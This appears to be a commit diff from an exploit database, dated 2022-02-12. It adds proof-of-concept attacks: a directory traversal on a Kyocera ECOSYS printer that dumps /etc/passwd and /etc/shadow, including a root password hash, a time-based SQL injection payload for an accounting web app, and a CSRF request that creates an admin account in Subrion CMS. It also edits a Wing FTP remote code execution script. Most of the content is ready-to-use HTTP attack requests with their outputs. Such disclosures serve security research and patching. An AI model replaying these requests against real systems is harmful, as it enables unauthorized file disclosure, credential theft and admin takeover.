DB: 2022-02-12

4 changes to exploits/shellcodes Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated) Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)
2022-02-12 05:02:07 +00:00 · 2022-02-12 05:02:07 +00:00 · 07b4b32301
commit 07b4b32301
parent a6102b7922
5 changed files with 262 additions and 2 deletions
--- a/exploits/hardware/webapps/50738.txt
+++ b/exploits/hardware/webapps/50738.txt
@ -0,0 +1,104 @@
+# Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)
+# Author: Luis Martinez
+# Discovery Date: 2022-02-10
+# Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
+# Tested Version: ECOSYS M2035dn
+# Tested on: Linux
+# Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated)
+
+# Proof of Concept:
+# 1.- Create a directory traversal payload
+# 2.- Add nullbyte to the end of the payload(%00)
+# 3.- Sent your request
+
+Request 1:
+
+GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1
+Cookie: rtl=0
+Host: X.X.X.X
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
+Accept: */*
+
+Response 1:
+
+HTTP/1.1 200 OK
+Content-Length: 844
+Upgrade: TLS/1.0
+Accept-Encoding: identity
+Date: Thu, 10 Feb 2022 15:55:57 GMT
+Server: KM-MFP-http/V0.0.1
+Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
+ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT"
+Content-Type: image/jpeg
+
+root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/bin/sh
+daemon:x:2:2:daemon:/usr/sbin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+adm:x:4:4:adm:/var/adm:/bin/sh
+lp:x:5:7:lp:/var/spool/lpd:/bin/sh
+sync:x:6:8:sync:/bin:/bin/sync
+shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown
+halt:x:8:10:halt:/sbin:/sbin/halt
+mail:x:9:11:mail:/var/mail:/bin/sh
+news:x:10:12:news:/var/spool/news:/bin/sh
+uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh
+operator:x:12:0:operator:/root:/bin/sh
+games:x:13:60:games:/usr/games:/bin/sh
+ftp:x:15:14:ftp:/var/ftp:/bin/sh
+man:x:16:20:man:/var/cache/man:/bin/sh
+www:x:17:18:www-data:/var/www:/bin/sh
+sshd:x:18:19:sshd:/var/run/sshd:/bin/sh
+proxy:x:19:21:proxy:/bin:/bin/sh
+telnetd:x:20:22:proxy:/bin:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+ais:x:101:101:ais:/var/run/ais:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+
+Request 2:
+
+GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1
+Cookie: rtl=0
+Host: X.X.X.X
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
+Accept: */*
+
+Response 2:
+
+HTTP/1.1 200 OK
+Content-Length: 480
+Upgrade: TLS/1.0
+Accept-Encoding: identity
+Date: Thu, 10 Feb 2022 16:10:16 GMT
+Server: KM-MFP-http/V0.0.1
+Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
+ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT"
+Content-Type: image/jpeg
+
+root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873::::::
+bin:*:15873::::::
+daemon:*:15873::::::
+sys:*:15873::::::
+adm:*:15873::::::
+lp:*:15873::::::
+sync:*:15873::::::
+shutdown:*:15873::::::
+halt:*:15873::::::
+mail:*:15873::::::
+news:*:15873::::::
+uucp:*:15873::::::
+operator:*:15873::::::
+games:*:15873::::::
+ftp:*:15873::::::
+man:*:15873::::::
+www:*:15873::::::
+sshd:*:15873::::::
+proxy:*:15873::::::
+telnetd:*:15873::::::
+backup:*:15873::::::
+ais:*:15873::::::
+nobody:*:15873::::::
--- a/exploits/php/webapps/50736.txt
+++ b/exploits/php/webapps/50736.txt
@ -0,0 +1,31 @@
+# Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)
+# Exploit Author: Alperen Ergel
+# Contact: @alpernae (IG/TW)
+# Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html
+# Version : 1.0
+# Tested on: windows 10 xammp | Kali linux
+# Category: WebApp
+# Google Dork: N/A
+# Date: 09.02.2022
+
+######## Description ########
+#
+#
+#  Authenticate and get update user settings will be appear the
+#  id paramater put your payload at there it'll be work
+#
+#
+#
+######## Proof of Concept ########
+
+========>>> REQUEST <<<=========
+
+GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa
+Upgrade-Insecure-Requests: 1
--- a/exploits/php/webapps/50737.txt
+++ b/exploits/php/webapps/50737.txt
@ -0,0 +1,122 @@
+# Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)
+# Date: 2022-02-09
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: https://subrion.org
+# Software Link: https://subrion.org/download
+# Version: 4.2.1
+# Tested on: Windows 10
+
+# [ About - Subrion CMS ]:
+#Subrion is a PHP/MySQL based CMS & framework,
+#that allows you to build websites for any purpose,
+#Yes, from blog to corporate mega portal.
+
+# [ Description ]:
+# CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS,
+# With this vulnerability, authorized users can be added to the system.
+
+# [ Sample CSRF Request ]:
+
+POST /subrion/panel/members/add/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902
+Content-Length: 2522
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/subrion/panel/members/add/
+Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="__st"
+
+YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="username"
+
+Aryan
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="fullname"
+
+AryanChehreghani
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="email"
+
+aryanchehreghani@yahoo.com
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="_password"
+
+Test1234!
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="_password2"
+
+Test1234!
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="usergroup_id"
+
+1
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="website"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="phone"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="biography"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="facebook"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="twitter"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="gplus"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="linkedin"
+
+
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="email_language"
+
+en
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="sponsored"
+
+0
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="featured"
+
+0
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="featured_end"
+
+2022-03-09 12:03
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="status"
+
+active
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="save"
+
+1
+-----------------------------386122140640094420852486902
+Content-Disposition: form-data; name="goto"
+
+list
+-----------------------------386122140640094420852486902--
--- a/exploits/windows/remote/50720.py
+++ b/exploits/windows/remote/50720.py
@ -1,4 +1,4 @@
-# Exploit Title: Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)
+# Exploit Title: Wing FTP Server - Authenticated RCE
 # Date: 02/06/2022
 # Exploit Author: notcos
 # Credit: Credit goes to the initial discoverer of this exploit, Alex Haynes.
@ -54,7 +54,7 @@ else:
    r = requests.post(url, headers=headers, data=data)
    cookie = 'UIDADMIN=' + r.cookies['UIDADMIN']
    print('Login successful - Cookie: ' + cookie)
-    url = "http://172.31.1.20:8080/admin_lua_script.html"
+    url = "http://" + target + ":" + targetport + "/admin_lua_script.html"
    headers = {
        "User-Agent": "Googlebot",
        "Cookie": cookie,
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44797,6 +44797,7 @@ id,file,description,date,author,type,platform,port
 50717,exploits/multiple/webapps/50717.txt,"FileBrowser 2.17.2 - Cross Site Request Forgery (CSRF) to Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,multiple,
 50718,exploits/php/webapps/50718.txt,"Hospital Management System 4.0 - 'multiple' SQL Injection",1970-01-01,nu11secur1ty,webapps,php,
 50719,exploits/php/webapps/50719.txt,"WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
+50738,exploits/hardware/webapps/50738.txt,"Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)",1970-01-01,"Luis Martínez",webapps,hardware,
 50721,exploits/php/webapps/50721.py,"Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion",1970-01-01,Ven3xy,webapps,php,
 50723,exploits/php/webapps/50723.txt,"WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
 50724,exploits/php/webapps/50724.txt,"WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
@ -44810,3 +44811,5 @@ id,file,description,date,author,type,platform,port
 50733,exploits/php/webapps/50733.py,"WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,
 50734,exploits/php/webapps/50734.txt,"WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
 50735,exploits/php/webapps/50735.txt,"WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
+50736,exploits/php/webapps/50736.txt,"Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)",1970-01-01,"Alperen Ergel",webapps,php,
+50737,exploits/php/webapps/50737.txt,"Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)",1970-01-01,"Aryan Chehreghani",webapps,php,